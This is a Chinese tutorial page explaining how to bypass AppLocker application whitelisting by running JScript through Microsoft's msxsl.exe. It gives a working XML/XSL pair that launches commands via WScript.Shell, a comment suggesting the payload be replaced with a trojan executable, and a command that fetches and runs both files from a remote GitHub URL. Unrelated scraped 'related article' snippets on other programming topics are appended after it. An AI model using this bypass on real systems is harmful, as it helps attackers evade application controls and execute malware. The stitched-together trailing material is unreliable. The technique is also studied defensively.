利用MSXSL.exe绕过AppLocker应用程序控制策略

1.需要用到微软工具MSXSL.exe,msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令,其下载地址为:

https://www.microsoft.com/en-us/download/confirmation.aspx?id=21714

2.执行该工具需要用到2个文件,分别为XML及XSL文件,其命令如下:

msxsl.exe test.xml exec.xsl

test.xml:

<?xml version="1.0"?>

<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>

<customers>

<customer>

<name>Microsoft</name>

</customer>

</customers>

 

exec.xcl:

<?xml version="1.0"?>

<?xml-stylesheet type="text/xsl" href="exec.xsl" ?>

<customers>

<customer>

<name>Microsoft</name>

</customer>

</customers>

 

exec.xsl

<?xml version=‘1.0‘?>

<xsl:stylesheet version="1.0"

xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

xmlns:msxsl="urn:schemas-microsoft-com:xslt"

xmlns:user="http://mycompany.com/mynamespace">

<msxsl:script language="JScript" implements-prefix="user">

   function xml(nodelist) {

var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");

//这里可以改造为执行你的木马文件如:

// var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & shell.exe");

   return nodelist.nextNode().xml;

   }

</msxsl:script>

<xsl:template match="/">

   <xsl:value-of select="user:xml(.)"/>

</xsl:template>

</xsl:stylesheet>

  

3.最终执行结果为:

4.也可以远程执行:

msxsl.exe https://raw.githubusercontent.com/backlion/demo/master/test.xml  https://raw.githubusercontent.com/backlion/demo/master/exec.xsl

时间: 2024-08-15 03:41:50

利用MSXSL.exe绕过AppLocker应用程序控制策略的相关文章

MCSE 2012之应用程序控制策略AppLocker

应用程序控制策略AppLocker 一.什么是AppLocker? AppLocker 是 Windows Server 2008 R2 和 Windows 7 中的新功能,是一款用于替代软件限制策略功能的全新系统管理工具.可提升软件限制策略的特性和功能.AppLocker 包含新的功能和扩展,可用于创建规则,从而根据文件的唯一标识符允许或拒绝应用程序运行,还可以指定哪些用户或组可以运行这些应用程序. AppLocker存在于 Windows Server 2008 R2 的所有版本以及 Win

怎么通过应用程序控制策略限制软件运行?(转载)

1.打开控制面板,选择管理工具.如下图所示:2.选择本地安全策略.如下图所示:3.打开本地安全策略后,打开"应用程序控制策略"--点击"Applocker".如下图所示:4.打开 Applocker 后如下图:5.再设置规则前先确认 Application Identity 服务是否设置为自动启动,只有该服务启动,Applocker 设置后才生效,开启方法同步骤 1 ,打开搜索后输入"Services.msc",打开服务设置界面.如下图所示:6.

利用wsdl.exe生成webservice代理类

根据提供的wsdl生成webservice代理类 1.开始->程序->Visual Studio 2005 命令提示 2.输入如下红色标记部分 D:/Program Files/Microsoft Visual Studio 8/VC>wsdl /language:c# /n:TestDemo /out:d:/Temp/TestService.cs D:/Temp/TestService.wsdl 在d:/Temp下就会产生一个TestService.cs 文件 注意:D:/Temp/T

解析利用wsdl.exe生成webservice代理类的详解

利用wsdl.exe生成webservice代理类:根据提供的wsdl生成webservice代理类1.开始->程序->Visual Studio 2005 命令提示2.输入如下红色标记部分D:/Program Files/Microsoft Visual Studio 8/VC>wsdl /language:c# /n:TestDemo /out:d:/Temp/TestService.cs D:/Temp/TestService.wsdl在d:/Temp下就会产生一个TestServ

[应用]来点实际,利用CB刷简历更新时间程序(python)

实际上就是一个python的curl应用.应tom的要求,现在公布给大家.希望能对大家有用. http://onefishum.blog.163.com/bl ... 052013324114213898/ 目前高端的工作是越来越难找了.本人做了51.zhaopin.猎聘网的刷简历程序,都和此类似,但目前这几个号称最大的招聘网站,根据我一段时间的跟踪分析,发现从去年开始,人员需求基本为0,大部招聘都是假的.所以开发才想做一个刷新简历更新时间程序,以便加大自身机会(工作不换工资不涨,为了活呀,只能

利用C#自带组件强壮程序日志

前言 在项目正式上线后,如果出现错误.异常.崩溃等情况, 我们往往第一想到的事就是查看日志. 所以日志对于一个系统的维护是非常重要的. 声明 本文中的示例代码旨在这个框架是怎么工作的,具体实现可以自由发挥. 贯穿所有的日志系统 日志系统,往往是贯穿一个程序的所有代码的; 试想一下,如果你的日志完全是由第三方组件提供的; 那么就意味着,你的所有项目都必须引用这个dll; 也许你会说自己可以2次封装,那么依然需要所有项目都引用你的这个封装后的log项目, 另一方面 一些log组件需要实例化后才可以使

把任意的EXE嵌入到自己程序中

把任意的EXE嵌入到自己程序中 taoyuan19822008-08-24上传 Delphi把任意的EXE嵌入到自己程序中的程序 资源积分:0分 下载次数:327 资源类型:其他 资源大小:175KB 资源得分: (42位用户参与评分) 把任意的EXE嵌入到自己程序中 进入下载页 收藏(1) 评论(14) 举报 VIP下载  免积分60元/年(1200次) 相关推荐 把任意的EXE嵌入到自己程序中 把任意的EXE嵌入到自己程序中 您可能还需要 Web程序设计 ...简单的C#宿...matlab

[转]利用C#自带组件强壮程序日志

利用C#自带组件强壮程序日志 在项目正式上线后,如果出现错误,异常,崩溃等情况 我们往往第一想到的事就是查看日志 所以日志对于一个系统的维护是非常重要的 声明 正文中的代码只是一个栗子,一个非常简单的栗子,只是说明这个框架是怎么工作的 具体实现可以自由发挥~~~~ 贯穿所有的日志系统 日志系统,往往是贯穿一个程序的所有代码的; 试想一下,如果你的日志完全是由第三方组件提供的; 那么就意味着,你的所有项目都必须引用这个dll; 也许你会说自己可以2次封装,那么依然需要所有项目都引用你的这个封装后的

php一个利用cookie限时发帖的小程序

/* * _timed()用来限制时间,如发帖限制 * @access public 表示函数对外公开 * @param $_now_time 现在时间 * @param $_pre_time 要对比的时间 * @param $_time 限制时间 * @param $_string 要提示的字符 * @return $_now_time-$_pre_time 表示返回过了多少秒 * */ function _timed($_now_time,$_pre_time,$_time,$_string